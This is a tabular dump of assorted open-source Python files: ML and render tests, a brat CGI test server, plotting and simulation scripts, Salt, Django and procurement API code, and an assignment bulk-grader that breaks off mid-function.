ext (string, 9 distinct values) | sha (string, 40 chars) | content (string, 3 to 1.04M chars)
---|---|---|
py | b410f4b15c5fd0a89d15b5b4c0e414358fe0fb12 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import argparse
import logging
import struct
import six
import nose
import numpy as np
from test_cpu_helper import TestModelInferenceCPU
class TestSeResnext50InferenceCPU(TestModelInferenceCPU):
"""
TestModelInferenceCPU
Args:
Return:
"""
def test_inference_seresnext50_cpu(self):
"""
Inference and check value
seresnext50 cpu model
Args:
None
Return:
None
"""
model_name = "SE_ResNeXt50_32x4d_pretrained"
tmp_path = os.path.join(self.model_root, "classification")
model_path = os.path.join(tmp_path, model_name, "model")
data_path = os.path.join(tmp_path, model_name, "data/data.json")
delta = 0.0001
res, exp = self.get_infer_results(model_path, data_path)
for i in range(len(res)):
self.check_data(res[i].flatten(), exp[i].flatten(), delta)
|
py | b410f5f812e288641b436497121de3a018313010 | #!/usr/bin/env python
'''
Run brat using the built-in Python CGI server for testing purposes.
Author: Pontus Stenetorp <pontus stenetorp se>
Version: 2012-07-01
'''
from BaseHTTPServer import HTTPServer, test as simple_http_server_test
from CGIHTTPServer import CGIHTTPRequestHandler
# Note: It is a terrible idea to import the function below, but we don't have
# a choice if we want to emulate the super-class is_cgi method.
from CGIHTTPServer import _url_collapse_path_split
from sys import stderr
from urlparse import urlparse
# Note: The only reason that we sub-class at all is the stupid is_cgi
# method that assumes the usage of specific CGI directories, I simply
# refuse to play along with this kind of non-sense.
class BRATCGIHTTPRequestHandler(CGIHTTPRequestHandler):
def is_cgi(self):
# Having a CGI suffix is really a big hint of being a CGI script.
if urlparse(self.path).path.endswith('.cgi'):
self.cgi_info = _url_collapse_path_split(self.path)
return True
else:
return CGIHTTPRequestHandler.is_cgi(self)
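# Example (hypothetical request path): '/foo/ajax.cgi?action=whoami' ends in
# '.cgi', so it is dispatched as a CGI script regardless of which directory
# it lives in.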
def main(args):
# BaseHTTPServer will look for the port in argv[1] or default to 8000
try:
try:
port = int(args[1])
except ValueError:
raise TypeError
except TypeError:
print >> stderr, '%s is not a valid port number' % args[1]
return -1
except IndexError:
port = 8000
print >> stderr, 'WARNING: This server is for testing purposes only!'
print >> stderr, (' You can also use it for trying out brat before '
'deploying on a "real" web server such as Apache.')
print >> stderr, (' Using this web server to run brat on an open '
'network is a security risk!')
print >> stderr
print >> stderr, 'You can access the test server on:'
print >> stderr
print >> stderr, ' http://localhost:%s/' % port
print >> stderr
simple_http_server_test(BRATCGIHTTPRequestHandler, HTTPServer)
if __name__ == '__main__':
from sys import argv
exit(main(argv))
|
py | b410f5fc4d8b5099c752a52090a56bc098781278 | #!/usr/bin/env python3
# Apache License, Version 2.0
import argparse
import os
import shlex
import shutil
import subprocess
import sys
def setup():
import bpy
for scene in bpy.data.scenes:
scene.render.engine = 'BLENDER_EEVEE'
# Enable Eevee features
scene = bpy.context.scene
eevee = scene.eevee
eevee.use_ssr = True
eevee.use_ssr_refraction = True
eevee.use_gtao = True
eevee.use_volumetric_shadows = True
eevee.volumetric_tile_size = '2'
for mat in bpy.data.materials:
mat.use_screen_refraction = True
mat.use_sss_translucency = True
# When run from inside Blender, render and exit.
try:
import bpy
inside_blender = True
except ImportError:
inside_blender = False
if inside_blender:
try:
setup()
except Exception as e:
print(e)
sys.exit(1)
def render_file(filepath, output_filepath):
dirname = os.path.dirname(filepath)
basedir = os.path.dirname(dirname)
subject = os.path.basename(dirname)
frame_filepath = output_filepath + '0001.png'
command = [
BLENDER,
"--background",
"-noaudio",
"--factory-startup",
"--enable-autoexec",
filepath,
"-E", "BLENDER_EEVEE",
"-P",
os.path.realpath(__file__),
"-o", output_filepath,
"-F", "PNG",
"-f", "1"]
try:
# Success
output = subprocess.check_output(command)
if os.path.exists(frame_filepath):
shutil.copy(frame_filepath, output_filepath)
os.remove(frame_filepath)
if VERBOSE:
print(" ".join(command))
print(output.decode("utf-8"))
return None
except subprocess.CalledProcessError as e:
# Error
if os.path.exists(frame_filepath):
os.remove(frame_filepath)
if VERBOSE:
print(" ".join(command))
print(e.output.decode("utf-8"))
if b"Error: engine not found" in e.output:
return "NO_ENGINE"
elif b"blender probably wont start" in e.output:
return "NO_START"
return "CRASH"
except BaseException as e:
# Crash
if os.path.exists(frame_filepath):
os.remove(frame_filepath)
if VERBOSE:
print(" ".join(command))
print(e)
return "CRASH"
def create_argparse():
parser = argparse.ArgumentParser()
parser.add_argument("-blender", nargs="+")
parser.add_argument("-testdir", nargs=1)
parser.add_argument("-outdir", nargs=1)
parser.add_argument("-idiff", nargs=1)
return parser
def main():
parser = create_argparse()
args = parser.parse_args()
global BLENDER, VERBOSE
BLENDER = args.blender[0]
VERBOSE = os.environ.get("BLENDER_VERBOSE") is not None
test_dir = args.testdir[0]
idiff = args.idiff[0]
output_dir = args.outdir[0]
from modules import render_report
report = render_report.Report("Eevee Test Report", output_dir, idiff)
report.set_pixelated(True)
report.set_reference_dir("eevee_renders")
report.set_compare_engines('eevee', 'cycles')
ok = report.run(test_dir, render_file)
sys.exit(not ok)
if not inside_blender and __name__ == "__main__":
main()
|
py | b410f6d5dab50cca8264501f7eb64e9cc09cf7e9 | import pandas as pd
from bokeh.models import HoverTool, ColumnDataSource
from bokeh.plotting import figure, show
from bokeh.sampledata.periodic_table import elements
elements = elements.copy()
elements = elements[elements.group != "-"]
elements.sort_values('metal', inplace=True)
colormap = {
"alkali metal" : "#a6cee3",
"alkaline earth metal" : "#1f78b4",
"halogen" : "#fdbf6f",
"metal" : "#b2df8a",
"metalloid" : "#33a02c",
"noble gas" : "#bbbb88",
"nonmetal" : "#baa2a6",
"transition metal" : "#e08e79",
}
source = ColumnDataSource(
data=dict(
atomic_number=elements["atomic number"],
sym=elements["symbol"],
name=elements["name"],
atomic_mass = pd.to_numeric(elements['atomic mass'], errors="coerce"),
density=elements['density'],
metal=[x.title() for x in elements["metal"]],
type_color=[colormap[x] for x in elements["metal"]]
)
)
mass_format = '{0.00}'
hover = HoverTool(tooltips="""
<div style="width: 62px; height: 62px; opacity: .8; padding: 5px; background-color: @type_color;">
<h1 style="margin: 0; font-size: 12px;"> @atomic_number </h1>
<h1 style="margin: 0; font-size: 24px;"><strong> @sym </strong></h1>
<p style=" margin: 0; font-size: 8px;"><strong> @name </strong></p>
<p style="margin: 0; font-size: 8px;"> @atomic_mass{mass_format} </p>
</div>
""".format(mass_format=mass_format)
)
p = figure(plot_width=900, plot_height=450, tools=[hover], title='Densities by Atomic Mass')
p.circle('atomic_mass', 'density', size=12, source=source, color='type_color',
line_color="black", legend='metal', fill_alpha=0.9)
p.xaxis.axis_label= 'Atomic Mass'
p.yaxis.axis_label= 'Density'
p.grid.grid_line_color = None
p.toolbar_location = None
l = p.legend[0]
l.plot = None
p.add_layout(l, 'right')
l.border_line_color = None
show(p)
|
py | b410f77fa7c2d7a96185b178267aac441bd21e55 | # -*- coding: utf-8 -*-
'''
Control Linux Containers via Salt
:depends: lxc execution module
'''
# Import python libs
from __future__ import print_function
# Import Salt libs
import salt.client
import salt.utils.virt
import salt.key
import salt.output
# Don't shadow built-in's.
__func_alias__ = {
'list_': 'list'
}
def _do(name, fun):
'''
Invoke a function in the lxc module with no args
'''
host = find_guest(name, quiet=True)
if not host:
return False
client = salt.client.get_local_client(__opts__['conf_file'])
cmd_ret = client.cmd_iter(
host,
'lxc.{0}'.format(fun),
[name],
timeout=60)
data = next(cmd_ret)
data = data.get(host, {}).get('ret', None)
if data:
data = {host: data}
return data
def _do_names(names, fun):
'''
Invoke a function in the lxc module with no args
'''
ret = {}
hosts = find_guests(names)
if not hosts:
return False
client = salt.client.get_local_client(__opts__['conf_file'])
cmds = []
for host, sub_names in hosts.items():
for name in sub_names:
cmds.append(client.cmd_iter(
host,
'lxc.{0}'.format(fun),
[name],
timeout=60))
for cmd in cmds:
data = next(cmd)
data = data.get(host, {}).get('ret', None)
if data:
ret.update({host: data})
return ret
def find_guest(name, quiet=False):
'''
Returns the host for a container.
.. code-block:: bash
salt-run lxc.find_guest name
'''
for data in _list_iter():
host, l = data.items()[0]
for x in 'running', 'frozen', 'stopped':
if name in l[x]:
if not quiet:
salt.output.display_output(
host,
'lxc_find_host',
__opts__)
return host
return None
def find_guests(names):
'''
Return a dict of hosts and named guests
'''
ret = {}
names = names.split(',')
for data in _list_iter():
host, stat = data.items()[0]
for state in stat:
for name in stat[state]:
if name in names:
if host in ret:
ret[host].append(name)
else:
ret[host] = [name]
return ret
def init(names,
host=None,
**kwargs):
'''
Initialize a new container
.. code-block:: bash
salt-run lxc.init name host=minion_id [cpuset=cgroups_cpuset] \\
[cpushare=cgroups_cpushare] [memory=cgroups_memory] \\
[template=lxc template name] [clone=original name] \\
[nic=nic_profile] [profile=lxc_profile] \\
[nic_opts=nic_opts] [start=(true|false)] \\
[seed=(true|false)] [install=(true|false)] \\
[config=minion_config] [snapshot=(true|false)]
names
Name of the containers, supports a single name or a comma delimited
list of names.
host
Minion to start the container on. Required.
cpuset
cgroups cpuset.
cpushare
cgroups cpu shares.
memory
cgroups memory limit, in MB.
template
Name of LXC template on which to base this container
clone
Clone this container from an existing container
nic
Network interfaces profile (defined in config or pillar).
profile
A LXC profile (defined in config or pillar).
nic_opts
Extra options for network interfaces. E.g:
{"eth0": {"mac": "aa:bb:cc:dd:ee:ff", "ipv4": "10.1.1.1", "ipv6": "2001:db8::ff00:42:8329"}}
start
Start the newly created container.
seed
Seed the container with the minion config and autosign its key. Default: true
install
If salt-minion is not already installed, install it. Default: true
config
Optional config parameters. By default, the id is set to the name of the
container.
'''
if host is None:
#TODO: Support selection of host based on available memory/cpu/etc.
print('A host must be provided')
return False
names = names.split(',')
print('Searching for LXC Hosts')
data = __salt__['lxc.list'](host, quiet=True)
for host, containers in data.items():
for name in names:
if name in sum(containers.values(), []):
print('Container \'{0}\' already exists on host \'{1}\''.format(
name, host))
return False
if host not in data:
print('Host \'{0}\' was not found'.format(host))
return False
kw = dict((k, v) for k, v in kwargs.items() if not k.startswith('__'))
approve_key = kw.get('approve_key', True)
if approve_key:
for name in names:
kv = salt.utils.virt.VirtKey(host, name, __opts__)
if kv.authorize():
print('Container key will be preauthorized')
else:
print('Container key preauthorization failed')
return False
client = salt.client.get_local_client(__opts__['conf_file'])
print('Creating container(s) \'{0}\' on host \'{1}\''.format(names, host))
cmds = []
ret = {}
for name in names:
args = [name]
cmds.append(client.cmd_iter(host,
'lxc.init',
args,
kwarg=kwargs,
timeout=600))
ret = {}
for cmd in cmds:
sub_ret = next(cmd)
if sub_ret and host in sub_ret:
if host in ret:
ret[host].append(sub_ret[host]['ret'])
else:
ret[host] = [sub_ret[host]['ret']]
else:
ret = {}
for host, returns in ret.items():
for j_ret in returns:
if j_ret.get('created', False) or j_ret.get('cloned', False):
print('Container \'{0}\' initialized on host \'{1}\''.format(
j_ret.get('name'), host))
else:
error = j_ret.get('error', 'unknown error')
print('Container \'{0}\' was not initialized: {1}'.format(j_ret.get('name'), error))
return ret or None
def _list_iter(host=None):
'''
Return a generator iterating over hosts
'''
tgt = host or '*'
client = salt.client.get_local_client(__opts__['conf_file'])
for container_info in client.cmd_iter(tgt, 'lxc.list'):
if not container_info:
continue
if not isinstance(container_info, dict):
continue
chunk = {}
id_ = container_info.keys()[0]
if host and host != id_:
continue
if not isinstance(container_info[id_], dict):
continue
if 'ret' not in container_info[id_]:
continue
if not isinstance(container_info[id_]['ret'], dict):
continue
chunk[id_] = container_info[id_]['ret']
yield chunk
def list_(host=None, quiet=False):
'''
List defined containers (running, stopped, and frozen) for the named
(or all) host(s).
.. code-block:: bash
salt-run lxc.list [host=minion_id]
'''
it = _list_iter(host)
ret = {}
for chunk in it:
ret.update(chunk)
if not quiet:
salt.output.display_output(chunk, 'lxc_list', __opts__)
return ret
def purge(name, delete_key=True, quiet=False):
'''
Purge the named container and delete its minion key if present.
WARNING: Destroys all data associated with the container.
.. code-block:: bash
salt-run lxc.purge name
'''
data = _do_names(name, 'destroy')
if data is False:
return data
if delete_key:
skey = salt.key.Key(__opts__)
skey.delete_key(name)
if data is None:
return
if not quiet:
salt.output.display_output(data, 'lxc_purge', __opts__)
return data
def start(name, quiet=False):
'''
Start the named container.
.. code-block:: bash
salt-run lxc.start name
'''
data = _do_names(name, 'start')
if data and not quiet:
salt.output.display_output(data, 'lxc_start', __opts__)
return data
def stop(name, quiet=False):
'''
Stop the named container.
.. code-block:: bash
salt-run lxc.stop name
'''
data = _do_names(name, 'stop')
if data and not quiet:
salt.output.display_output(data, 'lxc_force_off', __opts__)
return data
def freeze(name, quiet=False):
'''
Freeze the named container
.. code-block:: bash
salt-run lxc.freeze name
'''
data = _do_names(name, 'freeze')
if data and not quiet:
salt.output.display_output(data, 'lxc_pause', __opts__)
return data
def unfreeze(name, quiet=False):
'''
Unfreeze the named container
.. code-block:: bash
salt-run lxc.unfreeze name
'''
data = _do_names(name, 'unfreeze')
if data and not quiet:
salt.output.display_output(data, 'lxc_resume', __opts__)
return data
def info(name, quiet=False):
'''
Returns information about a container.
.. code-block:: bash
salt-run lxc.info name
'''
data = _do_names(name, 'info')
if data and not quiet:
salt.output.display_output(data, 'lxc_info', __opts__)
return data
|
py | b410f791be43056132e2f07b18d3ce3ab8595430 | #
# Copyright © 2021 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. No copyright is claimed
# in the United States under Title 17, U.S. Code. All Other Rights Reserved.
#
# SPDX-License-Identifier: NASA-1.3
#
from importlib import resources
from .extern import igrf as igrf_data
from .extern import aep8 as aep8_data
with resources.path(igrf_data, 'dgrf1945.dat') as p:
IGRF_DATA_PATH = str(p.parent.resolve())
with resources.path(aep8_data, 'ae8min.asc') as p:
AEP8_DATA_PATH = str(p.parent.resolve())
del igrf_data, aep8_data
|
py | b410f7a066edb60de6f96e06349e607018ea1cd0 | import numpy as np
import pySALESetup as pss
import matplotlib.pyplot as plt
from math import ceil
def CDF(x):
# The CDF
A = 2.908
B = 0.028
C = 0.320
L = 0.643
a = 99.4
return (1./a)*A/(B+C*np.exp(-L*x))
def PDF(x):
# The PDF
A = 2.908
B = 0.028
C = 0.320
L = 0.643
a = 99.4
pdf = (1./a)*A*L*C*np.exp(L*x)/(B+C*np.exp(L*x))**2.
return pdf
def lunar_pdf(x,LB_tol,UB_tol):
# Integrate PDF at a value of x
P = abs(CDF(x+UB_tol) - CDF(x-LB_tol))
return P
def PHI_(x):
"""
x must be in SI (metres); it is converted to mm internally,
because PHI is only defined for grain diameters in mm
"""
return -1.*np.log2(x*1000.)
def DD_(x):
return 2.**(-x)
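# Example (hypothetical diameter), showing the phi <-> diameter round trip:
#   PHI_(0.001) -> -log2(1.0) = 0.0, i.e. a 1 mm grain has Krumbein phi 0
#   DD_(0.0)    -> 1.0, i.e. back to a 1 mm diameter (DD_ returns mm)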
# Top and bottom mesh created separately
meshA = pss.Mesh(X=500,Y=1200,cellsize=2.5e-6)
meshB = pss.Mesh(X=500,Y=1200,cellsize=2.5e-6)
meshA.label='A'
meshB.label='B'
# target volume (area) fraction
vfrac = 0.5
# Store grain objects in list, 'grains'
grains = []
# Minimum Krumbein phi = min resolution (4 cppr)
# Max ... '' '' '' '' = max resolution (200 cppr)
# Max res is one which still fits in the domain
minphi = -np.log2(2*4*2.5e-3)
maxphi = -np.log2(2*200*2.5e-3)
# create 10 different particles
N = 10
# Generate N phi values and equiv radii (in cells)
phi = np.linspace(minphi,maxphi,N)
Rs = ((DD_(phi)*.5*1.e-3)/meshA.cellsize)
# interval over which to calculate number from pdf
# No. = |CDF(x+h) - CDF(x-h)| * no. of areas
h = abs(phi[1]-phi[0])*.5
# target area that ALL particles should take up at end
target_area = float(meshA.x*meshA.y*vfrac)
for r,p in zip(Rs,phi):
# generate grain object with radius r
g = pss.Grain(eqr=int(r))
# calculate the target number of grains from CDF (see above)
prob = abs(CDF(p+h) - CDF(p-h))
g.targetFreq = int(round(prob * (target_area/float(g.area))))
grains.append(g)
# library of grains has been generated, now place them into the mesh!
# Just meshA for now
# order grains from largest to smallest
grains = [g for _,g in sorted(zip(phi,grains))]
groupA = pss.Ensemble(meshA,name='mirror_test_ens')
try:
i = 0
for g in grains:
for f in range(g.targetFreq):
g.insertRandomly(meshA, m=1)
groupA.add(g,g.x,g.y)
except KeyboardInterrupt:
pass
groupA.optimise_materials(np.array([1,2,3,4,5,6,7,8]))
groupA.save()
meshA.fillAll(-1)
for xA,yA,gA,mA in zip(groupA.xc,groupA.yc,groupA.grains,groupA.mats):
gA.place(xA,yA,mA,meshA)
meshA.fillAll(9)
import copy
meshB = copy.deepcopy(meshA)
meshB.flipMesh()
meshA.blanketVel(-1500.,axis=1)
meshB.blanketVel(+1500.,axis=1)
meshC = pss.combine_meshes(meshA,meshB,axis=1)
meshC.top_and_tail()
meshC.viewMats()
meshC.viewVels()
meshC.save(fname='regolith_mirror_v3000.iSALE',compress=True)
meshC.multiplyVels()
meshC.save(fname='regolith_mirror_v1500.iSALE',compress=True)
meshC.multiplyVels()
meshC.save(fname='regolith_mirror_v750.iSALE',compress=True)
|
py | b410f852123fa07a520fbda3f224ebfd4643a72c | # -*- coding: utf-8 -*-
from cornice.resource import resource, view
from openprocurement.api.models import Award, Complaint, STAND_STILL_TIME, get_now
from openprocurement.api.utils import (
apply_data_patch,
save_tender,
)
from openprocurement.api.validation import (
validate_complaint_data,
validate_patch_complaint_data,
)
@resource(name='Tender Award Complaints',
collection_path='/tenders/{tender_id}/awards/{award_id}/complaints',
path='/tenders/{tender_id}/awards/{award_id}/complaints/{complaint_id}',
description="Tender award complaints")
class TenderAwardComplaintResource(object):
def __init__(self, request):
self.request = request
self.db = request.registry.db
@view(content_type="application/json", permission='create_award_complaint', validators=(validate_complaint_data,), renderer='json')
def collection_post(self):
"""Post a complaint for award
"""
tender = self.request.validated['tender']
if tender.status not in ['active.qualification', 'active.awarded']:
self.request.errors.add('body', 'data', 'Can\'t add complaint in current tender status')
self.request.errors.status = 403
return
complaint_data = self.request.validated['data']
complaint = Complaint(complaint_data)
self.request.validated['award'].complaints.append(complaint)
save_tender(self.request)
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url('Tender Award Complaints', tender_id=tender.id, award_id=self.request.validated['award_id'], complaint_id=complaint['id'])
return {'data': complaint.serialize("view")}
@view(renderer='json', permission='view_tender')
def collection_get(self):
"""List complaints for award
"""
return {'data': [i.serialize("view") for i in self.request.validated['award'].complaints]}
@view(renderer='json', permission='view_tender')
def get(self):
"""Retrieving the complaint for award
"""
return {'data': self.request.validated['complaint'].serialize("view")}
@view(content_type="application/json", permission='review_complaint', validators=(validate_patch_complaint_data,), renderer='json')
def patch(self):
"""Post a complaint resolution for award
"""
tender = self.request.validated['tender']
if tender.status not in ['active.qualification', 'active.awarded']:
self.request.errors.add('body', 'data', 'Can\'t update complaint in current tender status')
self.request.errors.status = 403
return
complaint = self.request.validated['complaint']
if complaint.status != 'pending':
self.request.errors.add('body', 'data', 'Can\'t update complaint in current status')
self.request.errors.status = 403
return
complaint_data = self.request.validated['data']
if complaint_data:
if complaint_data.get('status', '') == 'cancelled':
self.request.errors.add('body', 'data', 'Can\'t cancel complaint')
self.request.errors.status = 403
return
complaint.import_data(apply_data_patch(complaint.serialize(), complaint_data))
if complaint.status == 'resolved':
award = self.request.validated['award']
if tender.status == 'active.awarded':
tender.status = 'active.qualification'
tender.awardPeriod.endDate = None
if award.status == 'unsuccessful':
for i in tender.awards[tender.awards.index(award):]:
i.status = 'cancelled'
for j in i.complaints:
if j.status == 'pending':
j.status = 'cancelled'
for i in award.contracts:
i.status = 'cancelled'
award.status = 'cancelled'
unsuccessful_awards = [i.bid_id for i in tender.awards if i.status == 'unsuccessful']
bids = [i for i in sorted(tender.bids, key=lambda i: (i.value.amount, i.date)) if i.id not in unsuccessful_awards]
if bids:
bid = bids[0].serialize()
award_data = {
'bid_id': bid['id'],
'status': 'pending',
'value': bid['value'],
'suppliers': bid['tenderers'],
}
award = Award(award_data)
tender.awards.append(award)
else:
tender.awardPeriod.endDate = get_now()
tender.status = 'active.awarded'
elif complaint.status in ['declined', 'invalid'] and tender.status == 'active.awarded':
pending_complaints = [
i
for i in tender.complaints
if i.status == 'pending'
]
pending_awards_complaints = [
i
for a in tender.awards
for i in a.complaints
if i.status == 'pending'
]
stand_still_time_expired = tender.awardPeriod.endDate + STAND_STILL_TIME < get_now()
if not pending_complaints and not pending_awards_complaints and stand_still_time_expired:
active_awards = [
a
for a in tender.awards
if a.status == 'active'
]
if active_awards:
tender.status = 'complete'
else:
tender.status = 'unsuccessful'
save_tender(self.request)
return {'data': complaint.serialize("view")}
|
py | b410f8a9385591779c1b1df2eb01230d46f5a98b | from django.contrib import admin
# Register your models here.
from .models import *
# Register your models here.
class ProfileA(admin.ModelAdmin):
list_display=('user', 'Department','Course','Phone_number')
list_filter = ('Department','Course')
admin.site.register(Profile, ProfileA) |
py | b410fb7c229cc720134d59875e50f6100405ada3 | from onegov.file.models.file import File, SearchableFile
from onegov.file.models.fileset import FileSet
from onegov.file.models.associated_files import AssociatedFiles
__all__ = (
'AssociatedFiles',
'File',
'FileSet',
'SearchableFile'
)
|
py | b410fc8ea070fc061b00ce4355c4dd8abb4baad1 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Package contains modules for generating pipelines using interfaces
"""
__docformat__ = 'restructuredtext'
from .engine import Node, MapNode, JoinNode, Workflow
|
py | b410fcb96d45532e4e8b08296bd2e24b6a7dc737 | """
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import cryptoapis
from cryptoapis.model.get_zilliqa_block_details_by_block_hash_ri import GetZilliqaBlockDetailsByBlockHashRI
class TestGetZilliqaBlockDetailsByBlockHashRI(unittest.TestCase):
"""GetZilliqaBlockDetailsByBlockHashRI unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGetZilliqaBlockDetailsByBlockHashRI(self):
"""Test GetZilliqaBlockDetailsByBlockHashRI"""
# FIXME: construct object with mandatory attributes with example values
# model = GetZilliqaBlockDetailsByBlockHashRI() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | b410fce2001258b264b45889d9fef8de87c06592 | # Create your views here.
from rest_framework import viewsets, status
from rest_framework.decorators import permission_classes
from rest_framework.parsers import JSONParser
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from shares.models import Share
from shares.serializers import ShareSerializer
# Create your views here.
class ShareViewSet(viewsets.ModelViewSet):
queryset = Share.objects.all()
serializer_class = ShareSerializer
# Specify that this view's Content-Type is application/json
parser_classes = (JSONParser,)
def get_permissions(self):
if self.action in ('create',):
self.permission_classes = [IsAuthenticated]
return [permission() for permission in self.permission_classes]
# [GET] api/share/, no authorization required
def list(self, request, **kwargs):
users = Share.objects.all()
serializer = ShareSerializer(users, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
# [POST] api/share/, authorization required; adding the @permission_classes decorator causes get_permissions() to be called
@permission_classes((IsAuthenticated,))
def create(self, request, **kwargs):
name = request.data.get('name')
users = Share.objects.create(name=name)
serializer = ShareSerializer(users)
return Response(serializer.data, status=status.HTTP_201_CREATED)
|
py | b410fcf53a3daee17a32c1ae0aa94131eb4e72c8 | import os
import re
import sys
from pathlib import Path
from subprocess import run
from typing import Callable, Optional, List, Tuple, Dict, Set
from lib.functional import flatmap
from lib.model import Assignment, Check, CheckResult
from lib.grade import grade
from lib.checks import set_home_path, set_assignment_name
from lib.print import (is_in_quiet_mode, enter_quiet_mode, leave_quiet_mode, print_error,
print_message, print_usage, print_warning, print_grade, print_processing,
stop_processing_spinner, print_passed, print_failed)
DEFAULT_BULK_GRADE_DIRECTORY = os.path.abspath('./.repositories')
bulk_grade_mode = False
file_with_commit_links = None
bulk_grade_directory = DEFAULT_BULK_GRADE_DIRECTORY
def error(msg):
print_error(msg)
exit(1)
def parse_options(args, option_flags):
i = 0
options = list(map(lambda x: x[0], option_flags))
while len(args) > i and args[i][0] == '-':
if args[i] in options:
index = options.index(args[i])
if option_flags[index][2] is None:
option_flags[index][1]()
else:
i += 1
if len(args) > i:
option_flags[index][1](args[i])
else:
error('option flag "' + option_flags[index][0] +
'" needs an argument ' + option_flags[index][2])
else:
error('unknown option: ' + args[i])
i += 1
return args[i:]
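# Example (hypothetical invocation), using the option_flags defined further below:
#   parse_options(['-q', 'assignment-1'], option_flags) consumes '-q' (a flag
#   with no argument, so enter_quiet_mode() is called) and returns ['assignment-1'].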
def parse_assignment(args: List[str], assignments: Set[Assignment]) -> Optional[Assignment]:
if len(args) == 0:
return None
if len(args) > 1:
error('only 1 assignment allowed')
possible_assignment = list(filter(lambda a: a.name == args[0], assignments))
if len(possible_assignment) == 1:
return possible_assignment[0]
error('unknown test: {}'.format(args))
def validate_options_for(assignment: Optional[Assignment]):
if not bulk_grade_mode and is_in_quiet_mode() and assignment is None:
error('please specify an assignment')
def execute_with_output(check: Check) -> CheckResult:
print_processing(check.msg)
try:
result = check.execute()
finally:
stop_processing_spinner()
if result.result == result.should_succeed:
print_passed(check.msg)
else:
print_failed(check.msg, result.warning, result.output, result.command)
return result
def check_assignment(assignment: Assignment, baseline: Assignment) -> Tuple[int, List[str]]:
def check(a: Assignment):
return list(map(execute_with_output, a.create_checks()))
def change_result_to_mandatory(r: CheckResult):
return CheckResult(r.result, r.msg, r.output, r.warning, r.should_succeed, r.command, True)
if assignment != baseline:
baseline_results = list(map(change_result_to_mandatory, check(baseline)))
else:
baseline_results = [ ]
set_assignment_name(assignment.category)
print_message('executing test \'{}\''.format(assignment.name))
results = baseline_results + check(assignment)
set_assignment_name('')
(grade_value, reasons) = grade(results)
for reason in reasons:
print_warning(reason)
print_grade(grade_value)
def enable_bulk_grader(file):
global bulk_grade_mode, file_with_commit_links
if not os.path.exists(file):
error('the file "' + file + '" does not exist')
if not os.path.isfile(file):
error('the path "' + file + '" is not a file')
bulk_grade_mode = True
file_with_commit_links = os.path.abspath(file)
def set_bulk_grade_directory(directory):
global bulk_grade_directory
bulk_grade_directory = os.path.abspath(directory)
def parse_commit_url(url) -> Optional[Dict]:
matcher = re.match(
'^https://github.com/([^/]+)/([^/]+)/commit/([0-9a-f]+)$', url)
if matcher is None:
return None
else:
return {
'user': matcher.group(1),
'repo': matcher.group(2),
'commit': matcher.group(3)
}
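# Example (hypothetical commit link), matching the pattern above:
#   parse_commit_url('https://github.com/someuser/somerepo/commit/0a1b2c3d')
#   -> {'user': 'someuser', 'repo': 'somerepo', 'commit': '0a1b2c3d'}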
def do_bulk_grading(assignment: Optional[Assignment], base_test: Assignment):
if not os.path.exists(bulk_grade_directory):
os.mkdir(bulk_grade_directory)
working_directory = os.getcwd()
os.chdir(bulk_grade_directory)
with open(file_with_commit_links, 'rt') as file:
for line in file.readlines():
info = parse_commit_url(line)
if info is None:
print_message('"' + line.strip() + '" is not a valid github commit link')
continue
repo_id = '{}/{}'.format(info['user'], info['repo'])
print_message(repo_id + ': ', end='', loud=True)
clone_dir = os.path.join(bulk_grade_directory, repo_id)
if not os.path.exists(clone_dir):
status = os.system(
'git clone -q [email protected]:{} {} >/dev/null 2>&1'.format(repo_id, repo_id))
if status != 0:
print_message('error when cloning ' + repo_id, loud=True)
continue
os.chdir(clone_dir)
# remove all changes in local repository
os.system('git reset --hard -q >/dev/null 2>&1')
# fetch updates from github repository
os.system('git fetch -q >/dev/null 2>&1')
# change the local repository state using the commit ID
status = os.system(
'git checkout -q {} >/dev/null 2>&1'.format(info['commit']))
if status == 0:
if assignment is None:
print_message('updated', loud=True)
else:
print_message('')
check_assignment(assignment, base_test)
print_message('', loud=True)
else:
print_message(
'commit hash "{}" is not valid'.format(info['commit']))
os.chdir(bulk_grade_directory)
os.chdir(working_directory)
if bulk_grade_directory is DEFAULT_BULK_GRADE_DIRECTORY:
os.system('rm -rf {}'.format(bulk_grade_directory))
print_usage_flag = False
def set_print_usage():
global print_usage_flag
print_usage_flag = True
option_flags = [
('-q', enter_quiet_mode, None, 'only the grade is printed'),
('-h', set_print_usage, None, 'this help text'),
('-b', enable_bulk_grader, '<file>',
'bulk grade assignments defined by a file with github commit links'),
('-d', set_bulk_grade_directory, '<directory>',
'path where all bulk graded repositories should be saved')
]
def reset_state():
global bulk_grade_mode, bulk_grade_directory
global file_with_commit_links
global print_usage_flag
bulk_grade_mode = False
file_with_commit_links = None
bulk_grade_directory = DEFAULT_BULK_GRADE_DIRECTORY
set_assignment_name('')
print_usage_flag = False
leave_quiet_mode()
def process_arguments(argv: List[str], assignments: Set[Assignment], baseline: Assignment):
try:
if len(argv) <= 1:
print_usage(option_flags, assignments)
exit()
set_home_path(Path(os.path.abspath(os.path.dirname(argv[0]))))
args = parse_options(argv[1:], option_flags)
assignment = parse_assignment(args, assignments)
validate_options_for(assignment)
if print_usage_flag:
print_usage(option_flags, assignments)
exit()
